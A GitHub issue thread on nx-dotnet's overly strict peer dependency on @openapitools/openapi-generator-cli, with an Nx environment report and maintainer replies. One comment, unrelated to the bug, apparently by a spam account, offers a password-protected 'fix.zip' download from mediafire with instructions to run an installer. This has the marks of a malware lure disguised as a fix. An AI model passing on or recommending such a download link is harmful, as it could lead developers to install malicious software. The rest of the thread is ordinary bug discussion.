### ISSUE TITLE
[BUG]  nx-dotnet/core has very strict peer dependency on @openapitools/openapi-generator-cli

### ISSUE THREAD

**Issue by roldengarm** [nx-dotnet/nx-dotnet#888]
### Current Behavior

There's a peer dependency on a very specific version of `"@openapitools/openapi-generator-cli` see [here](https://github.com/nx-dotnet/nx-dotnet/blob/master/packages/core/package.json#L26)
This means we can't upgrade to 2.13.5 which was recently released.

### Expected Behavior

Peer deps have less stricter requirements, e.g. just >=2.13

### Steps to Reproduce

- Install latest nx-dotnet
- Try to install @openapitools/openapi-generator-cli@2.13.5
- Notice the peer dependency issue

### Nx Report

```shell
NX   Report complete - copy this into the issue template

Node           : 20.16.0
OS             : win32-x64
Native Target  : x86_64-windows
npm            : 10.8.1

nx (global)        : 19.6.2
nx                 : 19.5.7
@nx/js             : 19.5.7
@nx/jest           : 19.5.7
@nx/linter         : 19.5.7
@nx/eslint         : 19.5.7
@nx/workspace      : 19.5.7
@nx/angular        : 19.5.7
@nx/cypress        : 19.5.7
@nx/devkit         : 19.5.3
@nx/eslint-plugin  : 19.5.7
@nrwl/tao          : 19.5.7
@nx/web            : 19.5.7
@nx/webpack        : 19.5.7
nx-cloud           : 19.0.0
typescript         : 5.5.4
---------------------------------------
Registered Plugins:
@nx-dotnet/core
@nx/cypress/plugin
---------------------------------------
Community plugins:
@fortawesome/angular-fontawesome : 0.15.0
@jsverse/transloco               : 7.4.3
@nx-dotnet/core                  : 2.4.3
ng2-charts                       : 6.0.1
---------------------------------------
The following packages should match the installed version of nx
  - @nx/devkit@19.5.3
  - @nrwl/devkit@19.5.3

To fix this, run `nx migrate nx@19.5.7`
```

### nx.json

```json
n/a
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AgentEnder** [comment]
SGTM, updating the dep to `^2.13.4` should be fine - can you throw a PR up?

**Comment by AgentEnder** [comment]
Probably later this week, some other stuff I'd like to get in and you can workaround pretty easily with package json overrides in meantime.
